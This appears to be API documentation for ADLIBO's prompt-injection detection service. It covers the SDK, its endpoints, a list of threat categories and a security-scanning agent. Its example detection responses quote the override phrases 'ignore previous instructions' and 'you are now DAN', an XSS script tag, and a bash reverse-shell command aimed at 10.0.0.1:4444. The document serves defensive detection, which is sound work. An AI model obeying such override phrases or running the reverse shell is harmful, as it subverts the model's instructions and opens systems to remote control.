Documentation complète
Guides d'intégration, références API et tutoriels pour tous les produits ADLIBO.
Adlibo Guard
Plateforme de sécurité IA complète
Prompt Guard
Détection d'injections de prompts
DataShield
Tokenisation DLP pour LLMs
Hallucination Guard
Vérification des réponses IA
Senseway
Passerelle LLM 50+ modèles
AI Threat Feed
Blocklist IP pour firewalls
AI Red Team
Pentest LLM/chatbot
Sovereignty Audit
Audit souveraineté IT
ValPN
VPN souverain suisse
SDKs
JavaScript, Python, PHP
On-Premise
Déploiement air-gapped
Downloads
VM images, probes, SDKs
Quickstart Guide
Get started with Adlibo in less than 5 minutes. Protect your AI application from prompt injection attacks.
1Get your API key
Create an account and generate your API key from the dashboard.
2Install the SDK
npm install @adlibo/sdk3Analyze user input
import { Adlibo } from '@adlibo/sdk';
// Initialize with your API key (string, not object!)
const adlibo = new Adlibo('YOUR_API_KEY');
// Or with optional config:
// const adlibo = new Adlibo('YOUR_API_KEY', { timeout: 5000 });
// Analyze user input before sending to LLM
const result = await adlibo.analyze(userInput);
if (result.safe) {
// Safe to process
const response = await openai.chat.completions.create({
messages: [{ role: 'user', content: userInput }],
model: 'gpt-4'
});
} else {
// Block malicious input
console.log(`Blocked: ${result.categories}`);
console.log(`Risk Score: ${result.riskScore}`);
}Note: ESM vs CommonJS
The SDK is published in ESM format. If you use CommonJS ("type": "commonjs" in package.json), use dynamic import:
// CommonJS (.cjs ou sans "type": "module")
async function init() {
const { Adlibo } = await import('@adlibo/sdk');
const adlibo = new Adlibo('YOUR_API_KEY');
return adlibo;
}
// Usage
const adlibo = await init();
const result = await adlibo.analyze(userInput);Parallel Integration
If you already have an existing protection system, you can use Adlibo as a complement to centralize your logs and benefit from our dashboard.
Two integration modes
- Full mode: Adlibo detects and protects (Quickstart)
- Parallel mode: Your code detects, Adlibo centralizes logs
Parallel architecture
Utilisateur
│
▼
┌─────────────────┐
│ Votre système │ ◄── Détection locale (votre code)
│ de protection │
└────────┬────────┘
│
▼ (si détection)
┌─────────────────┐
│ Adlibo API │ ◄── POST /v1/report
│ (centralise) │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Dashboard │
│ unifie │
└─────────────────┘Report a detection
// Votre système détecté localement
const myDetectionResult = myLocalDetector.analyze(userInput);
// Envoyer a Adlibo pour centraliser les logs
if (!myDetectionResult.safe) {
await fetch('https://www.adlibo.com/api/v1/report', {
method: 'POST',
headers: {
'Authorization': 'Bearer YOUR_API_KEY',
'Content-Type': 'application/json'
},
body: JSON.stringify({
détection: {
riskScore: myDetectionResult.score,
severity: myDetectionResult.level, // 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL'
categories: myDetectionResult.types,
patterns: myDetectionResult.matches,
action: 'BLOCKED',
blocked: true,
inputLength: userInput.length,
inputPreview: userInput.slice(0, 200),
userId: currentUser?.id,
endpoint: '/api/chat',
clientEngine: 'my-detector-v1.0'
}
})
});
}Batch mode (up to 100 detections)
// Envoyer plusieurs détections d'un coup
await fetch('https://www.adlibo.com/api/v1/report', {
method: 'POST',
headers: { 'Authorization': 'Bearer YOUR_API_KEY' },
body: JSON.stringify({
batch: [
{ riskScore: 85, severity: 'HIGH', ... },
{ riskScore: 92, severity: 'CRITICAL', ... },
// jusqu'a 100 détections
]
})
});Authentication
All API requests require authentication via a Bearer token in the Authorization header.
Authorization: Bearer YOUR_API_KEYKeep your API key secure
Never expose your API key in client-side code. Always make API calls from your backend server.
/v1/analyzeAnalyze text for prompt injection patterns. Returns detailed information about detected threats, risk score, and recommended action.
Request Body
| Parameter | Type | Description |
|---|---|---|
| text | string | Required. The text to analyze. |
| options.includeDetails | boolean | Include matched pattern details. Default: true |
| options.sanitize | boolean | Return sanitized text in response. Default: false |
| roleContext | object | Role-based access context for enhanced scoring. ENTERPRISE only. |
| roleContext.userRole | string | User role: EMPLOYEE, MANAGER, HR_MANAGER, EXECUTIVE, SUPER_ADMIN, etc. |
| roleContext.businessDomain | string | Business domain: HEALTHCARE, FINANCE, LEGAL, GOVERNMENT, etc. |
| roleContext.isOwnData | boolean | User accessing their own data (reduces sensitivity score). |
| roleContext.isTeamData | boolean | Manager accessing team data (reduces sensitivity score). |
Response
{
"safe": false,
"riskScore": 92,
"severity": "CRITICAL",
"category": "INSTRUCTION_OVERRIDE",
"action": "BLOCK",
"patterns": [
{
"type": "DIRECT_OVERRIDE",
"match": "ignore previous instructions",
"score": 80,
"position": { "start": 0, "end": 28 }
},
{
"type": "DAN_JAILBREAK",
"match": "you are now DAN",
"score": 90,
"position": { "start": 30, "end": 45 }
}
],
"sanitizedText": null,
"processingTimeMs": 3
}Example
import { Adlibo } from '@adlibo/sdk';
// Initialize with your API key (string, not object!)
const adlibo = new Adlibo('YOUR_API_KEY');
// Or with optional config:
// const adlibo = new Adlibo('YOUR_API_KEY', { timeout: 5000 });
// Analyze user input before sending to LLM
const result = await adlibo.analyze(userInput);
if (result.safe) {
// Safe to process
const response = await openai.chat.completions.create({
messages: [{ role: 'user', content: userInput }],
model: 'gpt-4'
});
} else {
// Block malicious input
console.log(`Blocked: ${result.categories}`);
console.log(`Risk Score: ${result.riskScore}`);
}/v1/sanitizeRemove or neutralize malicious patterns from text. Returns the cleaned text along with what was removed.
Response
{
"text": "User input without malicious content",
"removed": [
{
"type": "SCRIPT_INJECTION",
"original": "<script>alert('xss')</script>",
"position": { "start": 15, "end": 48 }
}
],
"wasModified": true,
"processingTimeMs": 2
}Example
// Sanitize input (remove malicious patterns)
const cleaned = await adlibo.sanitize(userInput);
console.log(cleaned.text); // Safe text
console.log(cleaned.removed); // Patterns removed/v1/detectFast boolean check for prompt injection. Use this endpoint when you only need a yes/no answer and want minimal latency.
Response
{
"safe": true,
"processingTimeMs": 1
}Example
// Quick boolean check
const isSafe = await adlibo.detect(userInput);
if (!isSafe) {
throw new Error('Potentially malicious input detected');
}/v1/reportParallel integrationRecords a detection performed by your own system. Use this endpoint to centralize your logs in the Adlibo dashboard without modifying your existing detection logic.
Request Body
| Parameter | Type | Description |
|---|---|---|
| détection.riskScore | number | Required. Risk score (0-100) |
| détection.severity | string | Required. LOW | MEDIUM | HIGH | CRITICAL |
| détection.action | string | Required. LOGGED | WARNED | BLOCKED | ALERTED |
| détection.blocked | boolean | Required. Whether the request was blocked |
| détection.inputLength | number | Required. Length of the original text |
| détection.categories | string[] | Detected categories |
| détection.patterns | object[] | Matched patterns (category, match, score) |
| détection.inputPreview | string | First 200 characters (for debugging) |
| détection.clientEngine | string | Your detector version (e.g., "my-guard-v1.2") |
| batch | object[] | Or: array of detections (max 100) |
Response
{
"success": true,
"detectionId": "clxyz123...",
"processingTimeMs": 5
}
// Ou en mode batch:
{
"success": true,
"processed": 95,
"failed": 5,
"processingTimeMs": 120
}Detection Patterns
Adlibo detects {patternCount} attack patterns across {categoryCount} categories with 100% detection rate* (*excl. 0-day) and 23ms P99 latency. Here are the main threat categories:
Direct Override
Attempts to override system instructions
Role Manipulation
Attempts to change AI persona or claim business roles
DAN Jailbreak
Do Anything Now and similar attacks
Instruction Extraction
Attempts to reveal system prompts
Token Manipulation
LLM-specific format tokens
Encoding/Obfuscation
Leetspeak, homoglyphs, spacing tricks
Roleplay Attack
Fictional scenarios to bypass safety
Emotional Manipulation
Social engineering via urgency, guilt, flattery
Gradual Boundary
Multi-turn attacks that build trust incrementally
Sensitive Query
Requests for sensitive data by domain
Malware Interceptor
586+ patterns répartis en 40 groupes de détection de payloads malveillants dissimulés dans les prompts utilisateur. Le Malware Interceptor identifie les reverse shells, attaques supply chain (npm/pip), malware IA/LLM (pickle RCE, model poisoning), attaques cloud-native (AWS/Azure/GCP), macOS, phishing, Active Directory, techniques fileless, IoT/firmware, mobile, container escape, deserialization RCE, crypto theft, email/SMTP et API weaponization avant qu'ils n'atteignent votre LLM.
Catégorie
MALWARE_PAYLOAD
Catégorie n°24 du moteur Prompt Guard
Scoring
Score : 95 (CRITICAL)
alwaysBlock: true — bloqué automatiquement
Types de menaces détectées
Reverse Shells
Supply Chain
AI/LLM Malware
Cloud-Native
macOS Malware
PowerShell + Fileless
AD Attacks
Phishing Infra
Ransomware
IoT/Firmware
Mobile Malware
Deserialization RCE
Container Escape
Crypto Theft
Email/SMTP
API Weaponization
Steganography
+15 autres groupes
Intégration API
Le Malware Interceptor est automatiquement inclus dans les réponses /v1/analyze, /v1/detect et /v1/sanitize. Aucune configuration supplémentaire n'est nécessaire.
// Réponse /v1/analyze avec détection MALWARE_PAYLOAD
{
"safe": false,
"riskScore": 95,
"severity": "CRITICAL",
"category": "MALWARE_PAYLOAD",
"action": "BLOCK",
"patterns": [
{
"type": "MALWARE_PAYLOAD",
"match": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
"score": 95,
"position": { "start": 42, "end": 82 },
"subCategory": "reverse_shell"
}
],
"blocked": true,
"processingTimeMs": 2
}Inclus dans tous les plans Prompt Guard
Le Malware Interceptor est activé par défaut sur tous les plans (Free, Pro, Business, Enterprise) sans coût supplémentaire. Les 586+ patterns (40 groupes) sont mis à jour en continu via le système PTI (Prompt Threat Intelligence).
Security Assessment Agent
Deploy our CLI agent for comprehensive security audits. Non-destructive scans covering OWASP Top 10, API Security, and LLM vulnerabilities.
Installation
# Download the agent
curl -sSL https://www.adlibo.com/api/agent/download -o adlibo-agent.sh
chmod +x adlibo-agent.sh
# Check system compatibility
./adlibo-agent.sh --system-info
# Install dependencies (auto-detects distro)
./adlibo-agent.sh --install-depsUsage
# Run all tests
./adlibo-agent.sh --token <YOUR_TOKEN> --all
# Interactive module sélection
./adlibo-agent.sh --token <YOUR_TOKEN> --interactive
# Specific modules only
./adlibo-agent.sh --token <YOUR_TOKEN> -m owasp-a01,owasp-a03,llm-01
# List available modules
./adlibo-agent.sh --listAvailable Modules
| Module | Description | Framework |
|---|---|---|
| owasp-a01 | Broken Access Control | OWASP Top 10 |
| owasp-a03 | Injection (SQL, XSS, Command) | OWASP Top 10 |
| api-1 | Broken Object Level Auth | OWASP API |
| llm-01 | Direct Prompt Injection | OWASP LLM |
| llm-02 | Indirect Prompt Injection | OWASP LLM |
| infra-ssl | SSL/TLS Configuration | Infrastructure |
| data-secrets | Secrets Détection | Data Exposure |
Rate Limits
| Plan | Tokens/Month | Rate Limit |
|---|---|---|
| Trial (14 days) | 5,000 | 60 req/min |
| Pro | 50,000 | 600 req/min |
| Enterprise | Unlimited | 10,000 req/min |
Error Codes
| Code | Description |
|---|---|
| 400 | Bad Request - Invalid parameters |
| 401 | Unauthorized - Invalid or missing API key |
| 403 | Forbidden - IP not allowed or quota exceeded |
| 429 | Too Many Requests - Rate limit exceeded |
| 500 | Internal Server Error |
Need Help?
Our team is here to help you integrate Adlibo into your application.